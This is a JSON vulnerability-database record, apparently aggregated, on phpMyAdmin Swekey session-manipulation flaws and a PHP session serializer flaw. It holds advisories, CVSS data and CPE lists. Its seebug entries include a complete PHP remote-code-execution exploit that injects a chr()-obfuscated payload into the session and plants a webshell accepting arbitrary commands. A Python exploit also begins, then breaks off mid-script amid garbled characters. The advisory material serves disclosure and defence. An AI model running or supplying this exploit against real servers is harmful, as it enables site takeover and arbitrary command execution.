"confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2023-02-13T04:31:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:3.2.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.2", "cpe:/a:phpmyadmin:phpmyadmin:3.1.5", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8.1", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3", "cpe:/a:phpmyadmin:phpmyadmin:3.3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.4.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.0", "cpe:/a:phpmyadmin:phpmyadmin:3.4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.4", "cpe:/a:phpmyadmin:phpmyadmin:3.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.6", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.7"], "id": "CVE-2011-2719", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.1.0:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-12-02T15:55:47", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\nfeature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns\nvalues to arbitrary parameters referenced in the query string, which allows\nremote attackers to modify the SESSION superglobal array via a crafted\nrequest, related to a \"remote variable manipulation vulnerability.\"\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/phpmyadmin/+bug/806788>\n", "cvss3": {}, "published": "2011-07-14T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-14T00:00:00", "id": "UB:CVE-2011-2505", "href": "https://ubuntu.com/security/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T16:00:10", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through\n5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which allows\ncontext-dependent attackers to modify arbitrary session variables via a\ncrafted session variable name.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This is MOPS-2010-060\n", "cvss3": {}, "published": "2010-08-20T00:00:00", "type": "ubuntucve", "title": "CVE-2010-3065", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-08-20T00:00:00", "id": "UB:CVE-2010-3065", "href": "https://ubuntu.com/security/CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-02T15:55:35", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3\nand 3.4.x before 3.4.3.2 does not properly manage sessions associated with\nSwekey authentication, which allows remote attackers to modify the SESSION\nsuperglobal array, other superglobal arrays, and certain\nswekey.auth.lib.php local variables via a crafted query string, a related\nissue to CVE-2011-2505.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=725384>\n", "cvss3": {}, "published": "2011-08-01T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2719", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2011-08-01T00:00:00", "id": "UB:CVE-2011-2719", "href": "https://ubuntu.com/security/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "phpmyadmin": [{"lastseen": "2023-12-02T15:46:17", "description": "## PMASA-2011-5\n\n**Announcement-ID:** PMASA-2011-5\n\n**Date:** 2011-07-02\n\n**Updated:** 2011-07-03\n\n### Summary\n\nPossible session manipulation in Swekey authentication.\n\n### Description\n\nIt was possible to manipulate the PHP session superglobal using some of the Swekey authentication code. This could open a path for other attacks.\n\n### Severity\n\nWe consider this vulnerability to be critical.\n\n### Affected Versions\n\nThe 3.4.3 and earlier versions are affected.\n\n### Unaffected Versions\n\nBranch 2.11.x is not affected by this.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.3.10.2 or 3.4.3.1 or apply the related patch listed below.\n\n### References\n\nThis issue was found by Frans Pehrson from [Xxor AB](<http://www.xxor.se>). [His advisory.](<http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt>)\n\nAssigned CVE ids: [CVE-2011-2505](<https://vulners.com/cve/CVE-2011-2505>)\n\nCWE ids: [CWE-473](<https://cwe.mitre.org/data/definitions/473.html>) [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [7ebd958b2bf59f96fecd5b3322bdbd0b244a7967](<https://github.com/phpmyadmin/phpmyadmin/commit/7ebd958b2bf59f96fecd5b3322bdbd0b244a7967>)\n\nThe following commits have been made on the 3.3 branch to fix this issue:\n\n * [6e6e129f26295c83d67b74e202628a4b8bc49e54](<https://github.com/phpmyadmin/phpmyadmin/commit/6e6e129f26295c83d67b74e202628a4b8bc49e54>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2011-07-02T00:00:00", "type": "phpmyadmin", "title": "Possible session manipulation in Swekey authentication.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-03T00:00:00", "id": "PHPMYADMIN:PMASA-2011-5", "href": "https://www.phpmyadmin.net/security/PMASA-2011-5/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:53:53", "description": "A remote variable manipulation vulnerability has been reported in PhpMyAdmin. The vulnerability is due to insufficient validation of request parameters. A remote attacker could exploit this vulnerability by sending a malicious request to the server. Successful exploitation could result in modification of superglobal variables.", "cvss3": {}, "published": "2014-09-14T00:00:00", "type": "checkpoint_advisories", "title": "PhpMyAdmin ENV Superglobal Remote Variable Manipulation (CVE-2010-3065)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2019-06-19T00:00:00", "id": "CPAI-2014-1799", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-27T19:24:05", "description": "A remote variable manipulation vulnerability has been reported in PhpMyAdmin.", "cvss3": {}, "published": "2013-10-20T00:00:00", "type": "checkpoint_advisories", "title": "PhpMyAdmin Remote Variable Manipulation (CVE-2011-2505)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-2505"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2986", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-17T20:54:26", "description": "A Session Data Injection vulnerability has been reported in php framework.", "cvss3": {}, "published": "2013-10-20T00:00:00", "type": "checkpoint_advisories", "title": "PHP Session Serializer Session Data Injection (CVE-2010-3065)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3065"], "modified": "2013-01-01T00:00:00", "id": "CPAI-2013-2987", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "debiancve": [{"lastseen": "2023-12-02T18:29:08", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "debiancve", "title": "CVE-2011-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2011-07-14T23:55:00", "id": "DEBIANCVE:CVE-2011-2505", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T18:29:08", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "debiancve", "title": "CVE-2011-2719", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2011-08-01T19:55:00", "id": "DEBIANCVE:CVE-2011-2719", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T04:57:53", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through 5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which allows context-dependent attackers to modify arbitrary session variables via a crafted session variable name.", "cvss3": {}, "published": "2010-08-20T20:00:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-12-10T06:44:00", "id": "PRION:CVE-2010-3065", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T04:47:04", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "prion", "title": "Authentication flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2018-10-09T19:32:00", "id": "PRION:CVE-2011-2505", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T04:47:27", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "prion", "title": "Sql injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2719"], "modified": "2023-02-13T04:31:00", "id": "PRION:CVE-2011-2719", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2011-2719", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:56:18", "description": "No description provided by source.", "cvss3": {}, "published": "2011-12-26T00:00:00", "type": "seebug", "title": "phpMyAdmin3 remote code execute exploit [Not jilei(chicken\\'s ribs)]", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505"], "modified": "2011-12-26T00:00:00", "id": "SSV:26109", "href": "https://www.seebug.org/vuldb/ssvid-26109", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\nprint_r('\r\n+---------------------------------------------------------------------------+\r\npma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\\'s ribs)]\r\nby oldjun(www.oldjun.com)\r\nwelcome to www.t00ls.net\r\nmail: oldjun@gmail.com\r\nAssigned CVE id: CVE-2011-2505\r\n+---------------------------------------------------------------------------+\r\n');\r\n\r\n/**\r\n * working when the directory:"config" exists and is writeable.\r\n**/\r\n \r\nif ($argc < 3) {\r\n print_r('\r\n+---------------------------------------------------------------------------+\r\nUsage: php '.$argv[0].' host path\r\nhost: target server (ip/hostname)\r\npath: path to pma3\r\nExample:\r\nphp '.$argv[0].' localhost /pma/\r\n+---------------------------------------------------------------------------+\r\n');\r\n exit;\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n/**\r\n * Try to determine if the directory:"config" exists\r\n**/\r\necho "[+] Try to determine if the directory:config exists....\\n";\r\n$returnstr=php_request('config/');\r\nif(strpos($returnstr,'404')){\r\n exit("[-] Exploit Failed! The directory:config do not exists!\\n");\r\n}\r\n\r\n/**\r\n * Try to get token and sessionid\r\n**/\r\necho "[+] Try to get token and sessionid....\\n";\r\n$result=php_request('index.php');\r\npreg_match('/phpMyAdmin=(\\w{32,40})\\;(.*?)token=(\\w{32})\\&/s', $result, $resp);\r\n$token=$resp[3];\r\n$sessionid=$resp[1];\r\nif($token && $sessionid){\r\n echo "[+] token:$token\\n";\r\n echo "[+] Session ID:$sessionid\\n";\r\n}else{\r\n exit("[-] Can't get token and Session ID,Exploit Failed!\\n");\r\n}\r\n\r\n/**\r\n * Try to insert shell into session\r\n**/\r\necho "[+] Try to insert shell into session....\\n";\r\nphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.\r\n\r\n/**\r\n * Try to create webshell\r\n**/\r\necho "[+] Try to create webshell....\\n";\r\nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);\r\n/**\r\n * Try to check if the webshell was created successfully\r\n**/\r\necho "[+] Try to check if the webshell was created successfully....\\n";\r\n$content=php_request('config/config.inc.php');\r\nif(strpos($content,'t00ls')){\r\n echo "[+] Congratulations! Expoilt successfully....\\n";\r\n echo "[+] Webshell:http://$host{$path}config/a.php eval(\\$_POST[cmd])\\n";\r\n}else{\r\n exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\\n");\r\n}\r\n\r\nfunction php_request($url,$data='',$cookie=''){\r\n global $host, $path;\r\n \r\n $method=$data?'POST':'GET';\r\n \r\n $packet = $method." ".$path.$url." HTTP/1.1\\r\\n";\r\n $packet .= "Accept: */*\\r\\n";\r\n $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n";\r\n $packet .= "Host: $host\\r\\n";\r\n $packet .= $data?"Content-Type: application/x-www-form-urlencoded\\r\\n":"";\r\n $packet .= $data?"Content-Length: ".strlen($data)."\\r\\n":"";\r\n $packet .= $cookie?"Cookie: $cookie\\r\\n":"";\r\n $packet .= "Connection: Close\\r\\n\\r\\n";\r\n $packet .= $data?$data:"";\r\n\r\n $fp = fsockopen(gethostbyname($host), 80);\r\n if (!$fp) {\r\n echo 'No response from '.$host; die;\r\n }\r\n fputs($fp, $packet);\r\n\r\n $resp = '';\r\n\r\n while ($fp && !feof($fp))\r\n $resp .= fread($fp, 1024);\r\n\r\n return $resp;\r\n}\r\n \r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26109", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:09:46", "description": "No description provided by source.", "cvss3": {}, "published": "2011-07-10T00:00:00", "type": "seebug", "title": "phpMyAdmin3 (pma3) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-10T00:00:00", "id": "SSV:20714", "href": "https://www.seebug.org/vuldb/ssvid-20714", "sourceData": "\n #!/usr/bin/env python\r\n# coding=utf-8\r\n# pma3 - phpMyAdmin3 remote code execute exploit\r\n# Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>>\r\n# Thx Superhei\r\n# Tested on: 3.1.1, 3.2.1, 3.4.3\r\n# CVE: CVE-2011-2505, CVE-2011-2506\r\n# Date: 2011-07-08\r\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\r\n################################################\r\n \r\n# Requirements: 1. "config" directory must created&writeable in pma directory.\r\n# 2. session.auto_start = 1 in php.ini configuration.\r\n \r\n \r\nimport os,sys,urllib2,re\r\n \r\ndef usage(program):\r\n print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\r\nexecute exploit"\r\n print "Usage: %s <PMA_url>" % program\r\n print "Example: %s http://www.test.com/phpMyAdmin" % program\r\n sys.exit(0)\r\n \r\ndef main(args):\r\n try:\r\n if len(args) < 2:\r\n usage(args[0])\r\n \r\n if args[1][-1] == "/":\r\n args[1] = args[1][:-1]\r\n \r\n # \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd\r\n print "[+] Trying get form token&session_id.."\r\n content = 